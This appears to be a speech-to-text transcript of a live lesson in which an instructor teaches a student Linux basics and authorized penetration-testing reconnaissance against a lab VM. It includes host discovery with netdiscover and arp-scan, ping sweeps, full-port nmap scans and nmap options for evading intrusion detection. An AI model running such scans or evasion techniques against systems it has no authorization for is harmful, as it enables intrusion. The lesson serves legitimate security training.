Okay, this is going to be.
-->
I mean, let's do it.
-->
Let's do a little crash course.
-->
It's going to be fun.
-->
Okay.
-->
Now you are in home.
-->
You're in the student.
-->
uh type in who am i all one word oh should have known that and this is what we pentesters do
-->
right and who are you which is the before that little at insignia or that little asterisk in
-->
the middle you're a student that's the student the host name i'm not the host name that's the user
-->
of this particular linux terminal if you type in a name host name what's going to come up you have
-->
any idea? Can I type it? Go ahead. Press enter. Uh-oh. Type it all as one word. Cali. That's the
-->
password. Well, no. That's the system. The system name. So you have student at Cali. So when you type
-->
who am I, it's going to tell you the user that you're using. Something you need to know when
-->
you're doing pen testing. When you type host name, it's going to tell you the after the Adam
-->
insignia which is the name of the computer which is your operating system there you go fantastic
-->
okay and i'm actually looking at this list so now we're going to maneuver i would like for you to
-->
take type in cd which is change directory space dot dot press enter now type pwd you just at the
-->
top when you type pwd you are in slash home slash student you understand now you went back up you
-->
went up a directory from cd space dot dot to the home directory okay now pwd is one way to check
-->
but if you type the words ls and enter it will show you the different directories that are actually
-->
there now i would like for you to and listen to what i say change directory to student all right
-->
type pwd yay type list press enter yay that's what's inside student all right very similar to
-->
windows the only thing is when you do cd dot dot you do cd dot dot in windows and linux you do cd
-->
space dot dot that's just one way there's a whole bunch of ways now i'd like for you to cd space dot
-->
dot enter type cd space dot dot again enter you went all the way up to the root directory now
-->
type ls type pwd do you see where you are that forward slash dictates the tip top of the you're
-->
a ceo of now the company and everyone underneath you is apps boots xc etc etc the home directory
-->
i would like for you to change directory now all of these directories have meaning
-->
that's a google search we don't really have a whole lot of time to go through all that
-->
but these you need to know how to maneuver to these directories so i would like for you to go
-->
to the home directory. Don't type CD though. Just type the word home. Enter. That's another way to
-->
do it. Change directory does work, but I'm trying to show you multiple ways to do it. All right.
-->
Type list, LS. Okay. I want you to make a directory. Do you know how to do that?
-->
um i've made them before yes mkdir mkdir space and put donna enter
-->
uh-oh permission denied when that happens i want you to hit the up arrow
-->
control a whoops
-->
type sudo press enter type list and overcome your problem
-->
if you copy and paste this in the chat gpt if you do a search why didn't mkdr work it says
-->
can i create directory permission denied because you don't have enough administrative privileges
-->
right right so since you already created donna you don't need to do it again because it says
-->
the file exists yeah okay that's good though we i love it when you make mistakes or people
-->
make mistakes because then we go oh okay i know not to do that again we learn a lesson
-->
How do I un-make a mistake in this process, in this language?
-->
How do I un-make a mistake?
-->
You don't exactly un-make a mistake.
-->
You just learn from it.
-->
Learn what not to do.
-->
If it's something that's running, then maybe you want to stop it.
-->
But I'll show you that because we're going to do that in a minute.
-->
Okay.
-->
Let's see here.
-->
Customize the word panel.
-->
So normally when I do pen testing, I like to make directories for what I'm going to do.
-->
So now I want you to remove the directory that you just made type RMDIR, RM, not E, not RM.
-->
Yeah, RM.
-->
I gotcha, I gotcha.
-->
And remove Donna.
-->
Type LSD, uh-oh, uh-oh, same reason.
-->
What do we do?
-->
How do we fix it?
-->
Change directory.
-->
How do we, look at what it says.
-->
We read the output all the time, right?
-->
fail to remove so we have to do r m d i r again nope backspace you didn't read the whole thing
-->
to me i was waiting for you to get those last two words to remove donna permission denied so i have
-->
to do control a pseudo r m d i r and then rewrite my name do or you can hit the up arrow
-->
and do the same thing but yes control a control a pseudo enter now let's check it yay now go back
-->
into student change directory back in the student okay now now i want you to create a directory
-->
i want you to make a directory and call it basic pen testing put a underscore okay never mind that's
-->
fine too if you wanted to make um uh two words you would have to put an underscore between the
-->
word basic just throwing that out there press enter do a list there it is right there see
-->
basic pen testing now let's change directory to basic pen testing okay stop right there don't type
-->
anymore press the tab key yay press enter autofill wonderful dragon can now i want you to now open up
-->
your virtual box you may have to click on the dragon at the top left yeah right by the way
-->
there's 600 plus different tools you see it reconnaissance all the way down the surfaces
-->
and other tools type in virtual box go ahead and click on it
-->
you got your virtual box inside of the linux terminal isn't that cool
-->
yes now in the real world you're going to use a um a vpn to make sure people don't know who you
-->
are when you're hacking into a system legally because we don't do that illegally orange jumpsuit
-->
right ask what vpn you guys use because i think there are a lot of them are garbage so you you
-->
with a lot of things they don't what what should i use it's really up to you that's a personal
-->
question that's almost like what shirt should i wear today which shoes should i wear but the
-->
government will do research and they'll they'll have recommended ones that they use the pen testers
-->
will do research they may use something totally different in the end of the day though a government
-->
agency is still probably going to want to whitelist your ip so that you can actually
-->
have permission to do the work the um government pen tests um are very much controlled they want to
-->
know everything you're doing so there's no getting around it but you still want
-->
to whitelist a IP via your VPN maybe a different country or a country in the
-->
US but it's not actually your house you understand yes because we can reverse
-->
IP all kinds of stuff now we do you know you already know how to install stuff
-->
i'm not worried csec is actually basic pen testing one right so i'd like for you
-->
uh-oh it says can't all right just go ahead and close that can't enumerate i just powered it up
-->
no no no no no no that little orange on the right the little orange auto capture
-->
keyboard yeah go ahead and click x on the far right no no no no no no no cancel cancel hit cancel
-->
yeah well okay yeah yeah yeah knowing yeah click that X before up every time
-->
you see it just get rid of it they do now go ahead and click that same thing
-->
and it's taking its time so let's wait it out in summary what's happening now
-->
is you're opening up a pen test a vulnerable pen testing machine and it
-->
It looks like it's Marlin Spikes machine.
-->
Got it. So the scenario is this.
-->
Donna, you've been hired to conduct a penetration test of a specific IP address, a specific computer, right?
-->
You are going to be like, OK, what are the rules of engagement?
-->
What is the scope of this pen test? You're going to be writing it all down, right? You're going to present your legal certifications, your authority, your company, your NDA, all of your attorney's documents. You all are going to be talking. This is business, right?
-->
you are going to um document the ip address you're going to find out is this more of something
-->
we work together like a white box type pen test or is it something with black box where i'm just
-->
going to do whatever and get in any way i i can since this is one ip address it's going to be more
-->
white so you're going to kind of work together um or you may work individually in the room and
-->
if you need me, just come get me. If you see something that is a different IP address,
-->
well, that's like, instead of walking to my house, then you walk into my neighbor's house.
-->
That's a problem. So you want to report that, hey, there's another IP address here.
-->
It's not within my written scope. You understand? Yes. Fantastic. Because you're a consultant.
-->
You're a cybersecurity professional.
-->
You're not there to break into their systems.
-->
You're there just to test their security and make recommendations.
-->
It will be in the form of a report.
-->
You need total documentation.
-->
And you have lots of documents.
-->
You got Adratus.
-->
You got Cherry Tree.
-->
You have OneNote.
-->
You have all these different documents where you can document this stuff.
-->
Okay.
-->
You want to make sure you have insurance.
-->
because um you make a mistake they they don't care how much money you have don't have they just
-->
want theirs right end of the day we want to make sure that they don't prosecute you and we want to
-->
show them and give them uh well researched and experienced recommendations that are not just
-->
google and chat gpt based you need to go over you okay go ahead ask the question how much liability
-->
insurance are you indicating that what is normal that's consult that's an attorney question and
-->
and it could be very simple just saying you know you make mistakes yeah okay i understand
-->
now let's just say you have written permission you have all that stuff covered all the business
-->
stuff is covered you are in the mix you are now here you're going to conduct the pen test
-->
okay marlin spike you the machine is running meaning that they just put you on the network
-->
now i need you to minimize that machine because it's running
-->
uh-huh you look top right two clicks over from the blue x don't click the blue x two clicks to the
-->
left go to the left two times two bullets two circles nothing there go don't log out
-->
okay
-->
go ahead
-->
where is it
-->
I'm going to tell you
-->
I got you
-->
you see the blue X right
-->
go two buttons to the left
-->
there you go
-->
done
-->
that's minimized right
-->
now if you were doing this
-->
in Kali Linux there's a whole process
-->
for this doing a break or something
-->
or when we come back
-->
sometime this afternoon I'll show you how
-->
to do it inside of the virtual box right I do it all the time now you can minimize your virtual
-->
machine same way that no no no go back see the blue X go to the left go you know go to the top
-->
and click on the virtual machine I want you to see you see the blue X on the top I can't see
-->
that though? Can you see where I just can't see it? No idea. What's in the way? Nevermind. I just
-->
moved it with my finger. That'll never happen again. That's good. These are called lessons
-->
learned. You're learning tons of lessons. Now I would like for you to, okay, we're thinking, right?
-->
we are actually on the the network of that company okay i need you to type ip space a
-->
on the on the terminal press enter okay now ipa is short for ip address
-->
as a matter of fact type ip space address see what is your ip address of this um linux computer
-->
do you know the IP address is one zero point one zero zero point zero point four
-->
it's actually going to be number two which has ETH zero the ethel that is ten point zero point
-->
three point one five yes ten does it I feel that fifteen right so I always look at the ethel ethel
-->
zero right right that's usually what it is first and of course the loop back address is the one at
-->
the top. 127.0.0.1, that's used for testing and it's not given out. And you have another
-->
interface called Edge Zero, right? But we're not worried about that. What we need to find out,
-->
though, is the IP address of Marlin Spike. They didn't give it to you. They just gave you a name
-->
and said, okay, you're a pen tester. How can you find it? What would you do?
-->
First of all, you will have already gone through this. You would have done, you go to the research
-->
and say how to find IP address of target machine in Kali Linux, right? Don't do it now. I'm going
-->
to fast track you through it and then you're going to do it for the rest of your life. So I'm
-->
to show you two commands one is you're going to type sudo super user do space net discover
-->
all one word press enter all right it is currently running an address resolution protocol request
-->
looking for an ip address it's going to show you the mac address the count the length the mac
-->
vendor or the host name it says 10.0.3.1 okay and it's going to take a sweet time running through
-->
this thing so what i want you to do is to right click in the terminal and i want you to split
-->
view left and right now each of these terminals run independent i'm going to give you another command
-->
it's as a matter of fact click on the left left terminal type control shift plus plus plus make
-->
it bigger just click inside the box control shift plus plus plus control shift plus plus plus on the
-->
keyboard not typing anything left click inside the box left click not right click left click
-->
left click now do it now control shift plus plus plus don't do anything else look like you're
-->
trying to do something there you go you're getting it there you go now i can see it
-->
on the right side do the same thing click in it and control shift plus plus plus there you go
-->
that's how you make it larger for your audience to see it you may be working with other pen testers
-->
hey this is what i did this is what i found out right you may be a excellent at reconnaissance
-->
or information gathering someone else on your team may be excellent at numeration or vulnerability
-->
scanning etc etc you see how that works yeah now here's a clue do you see that mac address
-->
that starts with 0800 i do good now i need you to go back to your click on your virtual box
-->
and now i need you to write click on settings because it's already highlighted blue
-->
go to network okay do you see where it says mac address 0800 blah blah blah
-->
yes does that mac address match the mac address on the left over there it does hey you just found
-->
the ip address of your target machine cool okay this is how that go ahead and click on okay
-->
and then minimize the virtual box now on the right side i'm going to show you another command
-->
now remember in your notes this is how do i find the ip address in the government or most
-->
organizations they're probably going to give you the ip address because they don't want you
-->
slipping around their whole network but if they don't um um these are some strategies to find it
-->
now i want you to type sudo space a r p all right press ctrl e hit the backspace
-->
press ctrl e press enter yes now this is the art skin hey doc control e what does that do for me
-->
okay what did that just do it so we we did it earlier we're going to do it again right this
-->
second because you're going to learn type in um type the word history press ctrl a uh-oh
-->
type the up arrow type ctrl a i have to type it or you're saying hit it hit control button
-->
and the letter a what happened with the cursor oh it brings it back to the beginning press ctrl
-->
in the letter e what did it do now there you go yeah fantastic so now hit the up arrow twice
-->
one yeah press enter go back down okay hit the up arrow until you get the pseudo art scan
-->
press enter fantastic now tomorrow you're going to be putting all this stuff in the notes because
-->
we got to write a report so guess what we did now just so you know on the left side
-->
the net discover is still running can you see that yes on the right side is done can you see that
-->
yes which one is faster the right side which one is more thorough the right side
-->
well they look about the same except the left side is still running right
-->
left side's more thorough because it's still running and it's yeah there you go you got the
-->
answers now so we want to be as thorough as we can but if we can also identify the target that we're
-->
looking for and you've verified it because you know what the mac address is inside virtual box
-->
you just didn't know the ip address now you know the the ip address of marlin spikes machine
-->
You got it?
-->
Yep.
-->
You will have to know these commands.
-->
These commands, if you're writing up notes, and I'll show you mine later,
-->
is how do I find the IP address from my, you're the attack machine,
-->
Marlin Spike is the target machine, and you're going to type
-->
sudo net discover or sudo arp scan, arp dash scan space dash L.
-->
You don't have to do both of them, but that also depends.
-->
Now, here's the thing.
-->
Underneath that, I want you to type man.
-->
Just backspace twice.
-->
Type man space ARP dash scan.
-->
Don't forget the dash.
-->
Okay, it came up.
-->
Okay.
-->
Do you know what ARP means?
-->
I did.
-->
Address, resolution, there you go.
-->
Send ARP request to target host, which is what you did, and display the responses.
-->
And then you have the synopsis.
-->
It says ARP-scan, options, and host.
-->
That's exactly what we did, minus the IP address for the host.
-->
We just put the dash L.
-->
If you scroll down, pardon me, it will show you what the dash L means, right?
-->
Eventually, press Q.
-->
You don't have to worry about it now.
-->
What's the other command I showed you?
-->
The other command.
-->
TLDR space ARP dash scan.
-->
Scan the current local network.
-->
That's what dash L means, local net.
-->
scan an ip network with a custom bit mask it shows you that etc
-->
so now when we're conducting this net discover and this address resolution scan
-->
we are um information gathering well we've transitioned from um passive to active
-->
yes sir if we were doing this passively we'd be on facebook google dorts and looking up the url
-->
looking up the company name and trying to find out stuff with random google searches you understand
-->
okay um once you start getting active that's when the orange jumpsuit is being sized for you
-->
yes that's why we have to have written permission to do these things now we know the ip address
-->
and we can be verified it with two different tools when i took the cpin course it said
-->
you don't have to know a hundred different tools to do this you just need to be really
-->
proficient at with at least two or three of them for each section pen testing is pen testing
-->
you have people who are mega mega advanced in pen testing they can write their own scripts
-->
and one day we will get there but in the meantime we're just going to do basic pen tests to
-->
understand what we are doing what are your favorite tools i have way too many i have so many notes it's
-->
not even funny i have eight years worth of notes but arp scan and net discover are givens in this
-->
community for information gathering when you're doing passive stuff okay okay now on the left side
-->
we want to stop that do you know how stop that command from running because it's running you
-->
see it changing yes um just a q go ahead and type q and see what it does nada well it looks
-->
it stopped it to me you can also press ctrl c all right so we stopped that fantastic now we're doing
-->
a basic pen testing we know the ip address let's verify we've already verified that we have
-->
connectivity but this is something that you may have to do in the future so i'm gonna show you
-->
right now what command do we type to verify connectivity from the attack machine to the target
-->
machine ping it go ahead ping it it's the tab make sure you type the uh ip right because that
-->
wasn't it ah so now this is this is what i do to myself so how do i back out so how do you stop
-->
it we just talked about it you control c there you go that's your answer hit no no hit the up
-->
arrow just change the zero to a three backspace keep backspacing change that three and the three
-->
got 16 oh yeah I see hello oh three put that back because it's not lit you see
-->
how it's not lit it's grade it's because you put the period three that there you
-->
go one six press enter okay lesson for you oh I wrote the wrong idea originally
-->
yes okay i got you i got you sorry but what do you what do you see happening right now
-->
sending pings um you essentially created a ping flood right to the icmp right but that's what a
-->
pink flood is right well how do you stop it you how do i stop it q control c q did that work before
-->
yes uh q did not work before ctrl c worked there you go so think ctrl c q doesn't always work
-->
and with some other ones it's going to be colon wq it's going to be the escape button
-->
so we have to learn which if there's a lot of different ways to stop it and if you get stuck
-->
you will google search it or research it how do i stop this command from running
-->
or you'll take a screenshot put it there how do i stop this in linux it'll tell you okay
-->
now that ping means that we have connectivity you have zero percent loss and 45 or receive
-->
you can hit the up arrow put a space dash c space
-->
uh-oh oh i didn't mean to do that hit the up arrow up space put put the number eight
-->
press enter one two three four five six seven eight nice you can also establish a count
-->
now if you man ping this all those are written in the instructions
-->
our issue is we fly through stuff fast we can't do that we have to take our time
-->
okay i understand gotta read the output why do you want to give it a ping count you just don't
-->
want to be because if you don't you don't want it correct because if you don't is it'll run forever
-->
yes so if someone has done this for the very first time they're like it's pinging now what
-->
it's still pinging and then uh an ignorant person would sit there and let them go like this
-->
and they'll just giggle at them right the thing is we are trying to i'm trying to make sure you
-->
understand not just oh that worked but when it doesn't work what do i do you understand yes
-->
now I want you to hit the up arrow twice three times there you go press
-->
ctrl a type the letter F press enter oh oh you press something else press in
-->
yeah look at what it said it's alive right f ping if you go on the right side
-->
and man f ping right side right terminal man f ping i could never mind i got it
-->
send icmp echo request package to network host it's just another command right yes go ahead and
-->
press q and now you don't have to worry about the ping flood did you see that yes if you f paint
-->
now if it wasn't up it'll say down or dead sometimes they'll say it's alive or it's up
-->
okay look at all this stuff that we need to screenshot and put inside of our report and if
-->
we were writing our report in tandem we could be doing that it's fantastic which we're going to do
-->
later today or tomorrow right now we're going to get through this pen test and i want you to
-->
understand the analogy you ask questions as you are doing on the left side the left terminal okay
-->
imagine now i'm at your house you're at the front door and you gave me authorization to conduct
-->
a test of your security defenses of your home as soon as you wrote the documentation
-->
and you signed it you know what i'm gonna say close your door and go back inside and sit down
-->
and live your life you know what i'm going to do i'm going to walk around your house
-->
for as many days and hours or weeks that i can what am i looking for when i'm walking around your
-->
house okay i'll go with cracks which is a synonym to weaknesses which is a synonym to
-->
to vulnerabilities. Fantastic. Well, walking around your house physically, if I saw a window
-->
crack like this, and I said nothing to you, at a time of my choosing, that may be my vector,
-->
my opening into your, my attack vector into your house. You understand that? And then you would
-->
feel terrible. What do you mean I had a crack in the door? Now, pen testers are not allowed to
-->
break stuff, right? We should not break stuff. A really good ethical hacker, a crack through the
-->
door or the little window, that's not breaking. If I physically broke it, I had to pay for it.
-->
I'm in trouble, but I'm just trying to get inside the house unscathed without you seeing it.
-->
If I also notice that that crack was on the second floor window of your home, say you're in a house, but there was a basement door crack like this, which one do I want to go in?
-->
Both.
-->
I want to go in both, but which one will I more likely go into?
-->
Well, basement because it's more.
-->
Because I'm not Spider-Man.
-->
Right?
-->
I can hurt myself.
-->
I can get caught.
-->
I could be seen. Neighbors may see me climbing to open up a window in Clural Inn. That's no bueno,
-->
right? But if I can go at the right time of day, two o'clock in the morning, and I can slip in
-->
through the door, I know you have no dogs, right? I'm doing reconnaissance of your house
-->
without you knowing. I'm watching. She doesn't have any dogs. She lives alone, or maybe she has a
-->
a significant other and some children. Whatever the case is, I saw all the lights go out at like
-->
11 o'clock every night. I'll watch you for a few days. I'm trying to think, and I'll make the team.
-->
Hey, team, this is what I've seen. You see my notes? What do you think the best time? Then
-->
she wakes up at this time. I didn't see any lights come on between 11 and 5 a.m., so she's probably
-->
in a deep sleep. You understand what I'm saying? You're putting a lot of thought in. How am I
-->
going to attack successfully this person? I get inside your house. I get on your computer. I got
-->
everything I need. I got your money. I got everything I need. If I'm looking for something
-->
else, I want a stolen artifact. I got everything I need. Your job is to always protect all of your
-->
gold, your intellectual property, whatever that is, your money, your information on your computer,
-->
your intellectual property, KFC's secret recipe,
-->
your social security number, your private pictures. You want to keep
-->
people out physically, logically, and that's going to
-->
constitute policies, some
-->
digital strongholds, maybe even
-->
physical strongholds. Did I say too much?
-->
No. Also, you need to monitor
-->
everything, physical and logical. What do we do to monitor our physical? We lock out doors.
-->
We have alarm systems. Maybe we have cameras, motion detectives. And hopefully they give us
-->
an indication that in real time that something's happening and we go execute our protections.
-->
What do we have in our homes logically?
-->
So ironically, as I show people how to build socks in their houses.
-->
I have a sock in my house.
-->
A router.
-->
Well, the router is going to allow me to network with you and other people in the world.
-->
I'm talking about security operations.
-->
I'll show you an image later.
-->
A sock.
-->
Okay.
-->
Being able to monitor your home.
-->
If someone broke into your digital space right now, what do you have to detect them?
-->
There you go.
-->
Just a few bells and whistles, not much.
-->
Right.
-->
Most people have nothing.
-->
And that's what I'm saying.
-->
That's a few bells and whistles, right?
-->
Specific is usually equates to nothing.
-->
Organizations will find a hacker.
-->
They will watch you, right?
-->
After a while, they'll try to zero in to find out where you are and they'll attack you.
-->
or they'll send the police after you if they can't then they'll block you
-->
your job though is to get inside this organization
-->
and show them all their flaws and make recommendations you understand and that's
-->
why we're talking about both sides and i'm going to show you an image that'll wrap it all up later
-->
on so here's the thing you now verify that you have connectivity to the target machine
-->
Now, I just discussed with you what I would do physically and digitally. I would do some sort of
-->
even more information gathering and reconnaissance of your home. I'm not just going to walk in
-->
through your door because I don't know what you may have, a shotgun, a pit bull, some ninjas behind
-->
the door and i walk in and get my head chopped off right why would i just when you think a special
-->
forces team they don't go behind enemy line and start stuff they try to be quiet and hush hush
-->
on it the command i want you to remember now is now it's time to do a network mapping scan
-->
of the ip address so let's do it um discover no sudo no net discover we did that already
-->
you're going to just type in map and you're going to in map that ip address
-->
press ctrl e now press enter thank you got it when you see something pops up then you can press
-->
ctrl e or you can just type it all in now starting in map version 7.95 the latest version you got
-->
the date and you got the time the nmap scanner port for that ip address the host is up virtually
-->
no latency there are 997 closed ports but there looks like there are three open ports
-->
so when you do an nmap scan of an ip address it shows the first used 1000 ports how you learn
-->
how to use in map is you google an in map cheat sheet so you can find out more or less information
-->
so i'll need you to go to firefox oh i have one somewhere i have a physical one can i get it
-->
yes but i want you to use a digital one purpose because i want to show you some more to add to
-->
your physical go into the firefox and then hit the plus sign or yeah go right there you're fine
-->
Click on that, type in map cheat sheet, and I specifically want you to use the one from Station X.
-->
Oh, I love Station X.
-->
My God.
-->
No, there we go, Station X.
-->
Okay, now, I want you to type Control F.
-->
No, on Station X.
-->
Just make sure you click on there.
-->
Type in Control the letter F.
-->
Where?
-->
Don't matter.
-->
Just click there.
-->
Hit the control button and the letter close that that thing you're all
-->
Okay, and it came open. I think at the bottom left
-->
See what says specifies pro roundtrip. I don't know what that is, but a bottom left side left side bottom
-->
Specify right got it. So I want you to type in
-->
Time Tima like erase everything there highlight it all control a and press
-->
press delete type the word time press enter okay that table of contents close that it's in the way
-->
fantastic okay you type the word time did you see what came up
-->
no good go in the bottom left hit time again do you see the word time highlight yes right press enter
-->
again and you see it another time so then we we use this inside the sock to search for stuff
-->
on a page okay now um that's just an example let's see here um uh hit enter until you get
-->
the time and perform performance it's gonna be like see how it says nse scripts just scroll all
-->
the way down it'll be underneath there somewhere use the scroll bar if you have it there you go
-->
keep going keep going oh look at this right here this is interesting look firewall flash intrusion
-->
detection system evasion and spoofing you see how it has in map the um ip address in the dash f
-->
and the description requested scan including ping scans using tiny fragmented ip packets harder
-->
for packet filters in map is a very loud command you get on anybody's network and you type it
-->
minus home network and if they monitor the network like a security operation center style
-->
they're going to see you yes so pen testers create their own custom made in map scans to be hidden
-->
this cheat sheet is showing you some of the ways to hide it in the real world you don't want to get
-->
caught when you're doing a pen test you don't want to be seen this one cheat sheet has a bunch
-->
of different examples of how to do that keep scrolling down a little bit more it could be up
-->
but go down output scroll down helpful keep going i'm looking for a specific section i think it's
-->
near the top yeah scroll to the top it's like time and performance or something like that
-->
keep going keep going you you're going good with that speed before right there right there
-->
there you go look at how it says if you use the dash capital t and the number zero
-->
what does the description say and map the ip number paranoid intrusion detection system
-->
invasion yeah and the t1 is sneaky t2 is polite right then we got normal aggressive and insane
-->
nmap is insane on itself but if you put a dash t5 oh man you just begging to be caught
-->
you put the dash t0 you're like this i just don't want to get caught but keep this in mind
-->
it may take you five weeks before you get an answer if you don't have a super duper machine
-->
it may take forever you understand whereas for these vulnerable machines you can use the dash
-->
t5 and look at how it's written in the map the ip address space dash t5 right scroll scroll up a
-->
little bit more os detection so remote os detection is the attack capital o and fingerprinting right
-->
go up a little bit more you have the dash capital a scroll down one more the next section service
-->
and version detection enables os detection version detection script scanning and trace route
-->
so let's click on the terminal on the left hit the up arrow on the left one time
-->
put in a space tack capital a don't forget that oh tack means dash that's how we talk in cyber
-->
that's okay press enter now let's compare from the first in map scan to the second one notice
-->
how this one's taken a little bit look at all that information it gave you does that make your head
-->
hurt or what not yet good well Donna you are pen testing you are conducting vulnerability analysis
-->
of an IP address to see what's there to decide which one of these things I'm
-->
going to exploit which little window crack am I going to open am I going to
-->
do the second floor or the first one well there's more on the second floor than
-->
the first yes but getting up there is how do I get there and not be seen all
-->
these factors we call it common sense but it also to not everyone since it's
-->
common these are things that we need to know is first of all we don't want to get caught just don't
-->
secondly um how do i do this and get my information fast enough a lot of people in the pen test world
-->
like to in map and scan all 100 a whole 65 000 ports right let me show you that lesson now
-->
why would you want to do that though that's just way too many because because they don't know
-->
because all they want to do is find a flag i care less about a flag i'm talking about protecting
-->
your social security number and everyone else is on that home network your intellectual property
-->
and so forth that's what a flag represents in these boner hogs as long as you know that you're
-->
good hit the up arrow again hit a space dash p dash don't forget the dash dash p dash oh hold
-->
it dash p dash now hit enter again guess what you just added a new switch to the nmap the network
-->
mapping command and it's going to do an even more intrusive scan go back to the cheat sheet on your
-->
firefox go back to that cheat sheet in the firefox now i want you to do ctrl f and type dash p dash
-->
just go to the bottom left where it says time go back to firefox we were talking about firefox
-->
now oh i'm okay see where it says there you go type dash p dash there you go what are you doing
-->
scanning ports how many ports 65 000 or the ones that you picked to scan
-->
you can decide now now read the description what does it say uh specific target specific ports
-->
ranges or combinations of tcp and udp ports you're reading too much you have dash p dash
-->
highlighted in green right yes i do read that it scans all ports there you go oh all ports is what i
-->
want you to know so now we go back to the left just click in the box there you go starting in
-->
map 7.995 we scan a report for the ip virtually no latency not shown what's that number 65532
-->
you see that sure no okay go to the top of the in map scan in map 10.0 that 3.16 a dash p dash p
-->
yeah no i'm there okay put your cursor there and show me that you're there
-->
yeah now now go to the not shown there you go highlight the 655 532 oh i'm with you right
-->
the reason why you see that is because you put in the dash p dash
-->
yes because when you go go above it and look at the one above it post it up
-->
no no no scroll to the in map scan above it scroll up oh
-->
they go right there when you don't when you just put the dash oh you went too far
-->
go a little bit just a little bit go up a little bit just use the scroll bar
-->
there you go right there you see the in map scan you did before the um
-->
no i'm sorry you went down scroll up to the command you did before scroll don't don't type
-->
it in again just roll roll scroll the scroll let me go no just use the um no no no no you're you're
-->
typing the command so use the mouse and scroll to the command before the output before right here
-->
yeah i want you to show me the one before that scroll up go up use the cursor stuff whatever
-->
you've got to do to go up just click above left click right there do you have one of these on
-->
your mouse this thing right here i don't have a mouse okay can you swipe down a little bit or
-->
just so that you can see the command before it you just did it a second ago get the scroll bar
-->
it's like i'm so stuck use the scroll bar on the right use that scroll bar right there to the right
-->
right right there go up a little bit just go up a little bit there you go keep going keep going
-->
keep going keep going okay keep going keep going till you get to the command you type
-->
right there oh okay scroll down a little bit because i see the in map dash a i'm trying to
-->
get you to show that okay now scroll up again and just go slow until you get there
-->
no grab the um the bar like you did before you know what's happening is that my scroll
-->
it keeps getting hung up it will not scroll me all right so i'll go back down right there
-->
right there that's it that's it that's it that's it that's all i want you to do you just did it
-->
and it says um what am i looking for okay here's the question how many ports did both of those
-->
in map scans um how many ports did they scan well one of them was a thousand no 997 closed
-->
and three open no no no no no no add 997 plus three there you go that's the answer how many
-->
okay so let me say it again i want you to talk with confidence
-->
how many how many ports were scanned with both of those in map scans with both of them all the
-->
ports how about this in map 10.0.3.16 how many ports were scanned one thousand fantastic that's
-->
a great answer how many ports were open three how many points were closed 997. that's what
-->
So here's what. Those are test questions. If you decide to sit for a certification,
-->
those are test questions. I just wasn't. Yes, I understand.
-->
Now we did the dash capital A and we see what are the names of the three ports that are open?
-->
21, 22, and 80. And what is port 21? 21 is the TCP port.
-->
What does it say there for service?
-->
FTP.
-->
FTP.
-->
Which means what?
-->
FTP is...
-->
Go ahead and Google it if you don't know it.
-->
Yeah, I'm going to Google it.
-->
There you go.
-->
The protocol is file...
-->
Oh, I know this.
-->
See, that's the thing.
-->
I know this.
-->
It's just that file transfer protocol, port 21.
-->
Okay, good.
-->
So what does that infer?
-->
or what does that mean file transfer protocol what are you thinking it's the network file service
-->
which means what layman's terms how the network transfers files to the users which means that
-->
if i knew how ftp works i could potentially transfer files to or from the target machine
-->
you understand that that's how we dissect this when we see open ports right whereas if i walk
-->
around your house if i see that window cracked on the basement floor or the second floor i could
-->
potentially open the window and climb in or take stuff out you understand yes what is port 22
-->
422 is tcp ssh ssh which is soft shell which is a secure network which is secure secure shell
-->
right secure shell i mean secure shell yes right now so you can go ahead encrypt your message here
-->
which means that do you know how to use secure shell or ftp i've used that a lot in labs but i
-->
i mean do you remember what commands you type do i remember the commands you type you can say no
-->
i don't care no i don't know okay here it is it'll probably come back to me so here's the cool thing
-->
all you need is a username the service ftp or secure shell a password and then you can now
-->
send information back and forth or retrieve information do you understand that's how i
-->
will gain access to your intellectual property you understand now the last port port 80 what does that
-->
mean is the http port which means what http means just the the web pages you're pulling up no no
-->
H means this. T means that. T. Yes, yes, yes, it is. Hypertext transfer protocol. I knew you knew it. I did know that. I mean, I know them all. It's just that my, I don't know. It's just that my brain feels that this is new and it's not new. It's just that it's a new platform.
-->
so i get all i breathe like my brain pretends like it doesn't know that i know all this it's
-->
just not clicking on full cylinder and that's why we're taking our time so http hypertext transfer
-->
protocol and we see that's an apache 2.4.18 version right it says site doesn't have a title
-->
right they got the server header it's an ubuntu server wow we have all kinds of information that
-->
we gathered with that dash capital a we can see the difference between when we first did the um
-->
the first command which only gave us a few lines we did a dash capital a it gave us a lot more
-->
information right and we have to read every last line and then the bottom one with the tag the deck
-->
the tag the tack p dash is searched all 65 536 ports by the way the top port number is 65 535
-->
the bottom port number is zero that's what makes 65 536 ports you understand because computer starts
-->
with zero we humanoid starts with one we know zero is a uh uh nothing now i need you to scroll
-->
to the bottom on the left oh god the scroll yeah let's go down good so the the key here is when it
-->
highlights blue you're on top of it now i want you to hit the up oh i wanted you to hit the up arrow
-->
once i don't know what's going on here hit the upper one oh you gotta scroll down you way up
-->
there press the down arrow and go all the way down you're going down or up i'm down uh you can't be
-->
you can't don't hit the oh yeah hit the up arrow one time there you go stop okay space
-->
there's two ways to do this i want to show you the fast way the the greater than sign so shift
-->
and period space and i want you to type um basic pen testing in map scan dot txt that's a lot
-->
or you can put bp bp nmap scan dot txt yes or no all one word bp nmap scan dot txt all one word
-->
dot but don't forget the dot you need that dot that's the extension dot txt got it yes sir
-->
press enter it's it's thinking it's waiting it's doing it's making us wait what happened
-->
Okay, good. Now I want you to list everything that's there. Type ls and enter. Do you see
-->
that right there? Go ahead and open it. Do you know how to open it? Type cat for concatenate
-->
space type the letter b in the tab key press enter there you go you created a text file
-->
with all that stuff so now you can use that later for your documentation
-->
okay concat is concatenate which is how you open up a file from the terminal bad guys like to work
-->
in the terminal they more hidden that way so now we got that preserved you can do that for anything
-->
by the way yeah and i think the actual on that cheat sheet i think it shows you how to create
-->
a file i think it's the tack o capital n command that shows you how to do that you now have this
-->
data you take this data and you come back to the lab either by yourself or with the team and say
-->
hmm i need to learn how ftp works i need to learn how ssh works i need to learn how port 80 works
-->
Wait a minute. Port 80. Isn't that just the browser? Isn't that just the browser?
-->
Isn't it what just the browser? Port 80?
-->
Port 80.
-->
No.
-->
Yes, it is.
-->
Go to Firefox.
-->
Go to Firefox.
-->
Okay, open up a new tab and type in 10.0.3.16.
-->
Press enter.
-->
Okay, type it in the URL at the top.
-->
Look at the message. It works.
-->
it says this is the default page for the server that is not a good thing we should never be able
-->
to access a server but as a pen test you like this oh there's something going on here the web server
-->
software is running but no content has been added yet hmm what are some things we can do way too
-->
many one is right click that page click on view page source man okay all right i don't see anything
-->
here that's making me jump so i'll i can now close that you will you will look to the right
-->
is there something in the way yeah i got it okay now this is all stuff you should be documenting
-->
